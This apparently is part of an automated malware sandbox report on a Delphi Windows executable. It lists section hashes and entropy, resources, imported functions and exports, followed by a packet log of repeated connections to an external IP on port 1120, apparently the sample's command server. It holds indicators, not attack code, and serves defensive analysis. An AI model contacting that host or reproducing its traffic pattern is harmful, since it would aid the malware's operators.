.didata	0x994000	0x914c	0x9200	c9086741b6c150ce3727b78eeda72390	False	0.17133989726027396	data	3.975549279463611	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x99e000	0x9d	0x200	893e24d9392a63a4bd48cfc340b37cc7	False	0.26171875	data	1.9432984069935513	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x99f000	0x370	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x9a0000	0x6d	0x200	3a09e226e89da21473e0f2289fb020ea	False	0.197265625	data	1.370336840113611	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a1000	0x7a060	0x7a200	fdb73105589a0ad9d40ae623e4b179e4	False	0.43909328620777893	data	6.432756868541645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata	0xa1c000	0x70b30	0x70c00	ac0dd8c50313df6cc28cac3e8c6627d7	False	0.49761164426274945	data	6.507502255985033	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xa8d000	0x100200	0x100200	14a3d9c97ffbaef84a596c5ba9d9fad7	False	0.3376313521839922	data	6.47263636951494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xa8e0a0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0xa8e1d4	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0xa8e308	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0xa8e43c	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0xa8e570	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0xa8e6a4	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0xa8e7d8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0xa8e90c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688			0.4147121535181237
RT_ICON	0xa8f7b4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152			0.476985559566787
RT_ICON	0xa9005c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.48554913294797686
RT_ICON	0xa905c4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.5167012448132781
RT_ICON	0xa92b6c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.5719981238273921
RT_ICON	0xa93c14	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.7109929078014184
RT_STRING	0xa9407c	0x4ec	data			0.3595238095238095
RT_STRING	0xa94568	0x7d4	data			0.3373253493013972
RT_STRING	0xa94d3c	0x6c8	data			0.3675115207373272
RT_STRING	0xa95404	0x6ec	data			0.3741534988713318
RT_STRING	0xa95af0	0x69c	data			0.324468085106383
RT_STRING	0xa9618c	0x54c	data			0.3414454277286136
RT_STRING	0xa966d8	0x888	data			0.2793040293040293
RT_STRING	0xa96f60	0x518	data			0.36809815950920244
RT_STRING	0xa97478	0xcb8	data			0.2976044226044226
RT_STRING	0xa98130	0x5ac	data			0.3856749311294766
RT_STRING	0xa986dc	0x690	data			0.31785714285714284
RT_STRING	0xa98d6c	0x764	data			0.2869978858350951
RT_STRING	0xa994d0	0x69c	data			0.3321513002364066
RT_STRING	0xa99b6c	0x4e4	data			0.3586261980830671
RT_STRING	0xa9a050	0x528	data			0.33484848484848484
RT_STRING	0xa9a578	0x5ac	data			0.3443526170798898
RT_STRING	0xa9ab24	0x390	data			0.44298245614035087
RT_STRING	0xa9aeb4	0x3d4	data			0.4153061224489796
RT_STRING	0xa9b288	0x53c	data			0.3082089552238806
RT_STRING	0xa9b7c4	0x3d0	data			0.3719262295081967
RT_STRING	0xa9bb94	0x2c0	data			0.4303977272727273
RT_STRING	0xa9be54	0x124	data			0.6061643835616438
RT_STRING	0xa9bf78	0x320	data			0.45125
RT_STRING	0xa9c298	0x478	data			0.3758741258741259
RT_STRING	0xa9c710	0x560	data			0.35319767441860467
RT_STRING	0xa9cc70	0x508	data			0.3517080745341615
RT_STRING	0xa9d178	0x33c	data			0.3321256038647343
RT_STRING	0xa9d4b4	0x408	data			0.40310077519379844
RT_STRING	0xa9d8bc	0xd8	data			0.6666666666666666
RT_STRING	0xa9d994	0xd0	data			0.6634615384615384
RT_STRING	0xa9da64	0x2f4	data			0.44576719576719576
RT_STRING	0xa9dd58	0x3e0	data			0.3780241935483871
RT_STRING	0xa9e138	0x398	data			0.3793478260869565
RT_STRING	0xa9e4d0	0x52c	data			0.31797583081570996
RT_STRING	0xa9e9fc	0x210	data			0.32007575757575757
RT_STRING	0xa9ec0c	0x460	data			0.40625
RT_STRING	0xa9f06c	0x664	data			0.35146699266503667
RT_STRING	0xa9f6d0	0x4f4	data			0.35252365930599366
RT_STRING	0xa9fbc4	0x3a0	data			0.3728448275862069
RT_STRING	0xa9ff64	0x348	data			0.39166666666666666
RT_STRING	0xaa02ac	0x3bc	data			0.36506276150627615
RT_STRING	0xaa0668	0x410	data			0.3798076923076923
RT_STRING	0xaa0a78	0xe8	data			0.5474137931034483
RT_STRING	0xaa0b60	0xc4	data			0.6275510204081632
RT_STRING	0xaa0c24	0x268	data			0.48863636363636365
RT_STRING	0xaa0e8c	0x434	data			0.3308550185873606
RT_STRING	0xaa12c0	0x360	data			0.38425925925925924
RT_STRING	0xaa1620	0x2ec	data			0.37566844919786097
RT_STRING	0xaa190c	0x31c	data			0.34296482412060303
RT_RCDATA	0xaa1c28	0x627e	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3	English	United States	0.9922265408106608
RT_RCDATA	0xaa7ea8	0x10	data			1.5
RT_RCDATA	0xaa7eb8	0x40969	data	English	United States	0.572966475526643
RT_RCDATA	0xae8824	0x101c	data			0.4604752667313288
RT_RCDATA	0xae9840	0x151	Delphi compiled form 'TForm1'			0.7210682492581603
RT_RCDATA	0xae9994	0x87b	Delphi compiled form '\031TfrmFDGUIxFMXAsyncExecute\030frmFDGUIxFMXAsyncExecute\004Left\002'			0.43574389682174114
RT_RCDATA	0xaea210	0xcbc	Delphi compiled form 'TfrmFDGUIxFMXOptsBase'			0.6263803680981596
RT_RCDATA	0xaeaecc	0x4c651	data	English	United States	0.17103795623703713
RT_RCDATA	0xb37520	0x5580d	data	English	United States	0.2652239585861499
RT_GROUP_CURSOR	0xb8cd30	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0xb8cd44	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0xb8cd58	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xb8cd6c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xb8cd80	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xb8cd94	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xb8cda8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0xb8cdbc	0x5a	data			0.7
RT_VERSION	0xb8ce18	0x368	data	English	United States	0.44954128440366975

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FindResourceW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll	WINNLSEnableIME, SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateLayeredWindow, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TrackMouseEvent, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxIndirectW, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextLengthW, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AppendMenuW, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetCharABCWidthsFloatW, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateFontW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	lstrlenW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, OutputDebugStringW, MultiByteToWideChar, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetSystemDirectoryW, GetStdHandle, GetLongPathNameW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, ExpandEnvironmentStringsW, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringA, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CreateStreamOnHGlobal, ReleaseStgMedium, OleDraw, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll	isxdigit, isupper, isspace, ispunct, isprint, islower, isgraph, isdigit, iscntrl, isalpha, isalnum, toupper, tolower, strchr, strncmp, memset, memcpy, memcmp
shell32.dll	ShellExecuteW, Shell_NotifyIconW, DragQueryFileW
comdlg32.dll	PageSetupDlgW, PrintDlgW, GetSaveFileNameW, GetOpenFileNameW
winspool.drv	SetPrinterW, OpenPrinterW, GetPrinterW, GetDefaultPrinterW, EnumPrintersW, DocumentPropertiesW, DeviceCapabilitiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW
winmm.dll	timeGetTime
d3d9.dll	Direct3DCreate9

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4a3e00
__dbk_fcall_wrapper	2	0x417dd0
dbkFCallWrapperAddr	1	0xd72f58

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 24, 2024 17:46:05.518596888 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:05.524440050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:05.524564028 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:05.525175095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:05.530284882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:06.099664927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:06.161540985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.275376081 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.280296087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.280455112 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.285444975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.488790989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.529495955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.581373930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.583678007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.588510990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.588645935 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.594696045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.794992924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.842040062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.927822113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.928714991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.933581114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.933713913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.938515902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.949995041 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.955106020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:08.955405951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:08.960325956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.063500881 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.068305016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.068561077 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.073766947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241128922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241162062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241178036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241272926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241285086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241318941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.241318941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.241619110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241633892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241652966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241666079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241677046 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.241678953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.241759062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.241759062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.242434978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.270684004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.270983934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.271406889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.326280117 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.327558041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.327577114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.327594042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.327706099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.333695889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.333769083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.333781958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.333805084 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.333836079 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.333970070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.333976984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.334007025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.334206104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.334218979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.334232092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.334346056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.335108995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335124016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335144997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335158110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335171938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335196018 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.335196972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.335278034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.335330009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335423946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335436106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335453987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.335479021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.335535049 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.335650921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.336441040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.336519957 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.336524010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.388741970 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.625961065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.625983000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.625993013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626137972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626149893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626163006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626202106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626202106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626262903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626276016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626322985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626336098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626360893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626360893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626377106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626456022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626466990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626473904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626564980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626807928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626828909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626842022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626853943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626867056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626873970 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626873970 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626880884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626893997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626912117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:09.626914978 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:09.626924992 CEST	1120	49730	64.95.13.143	192.168.2.4
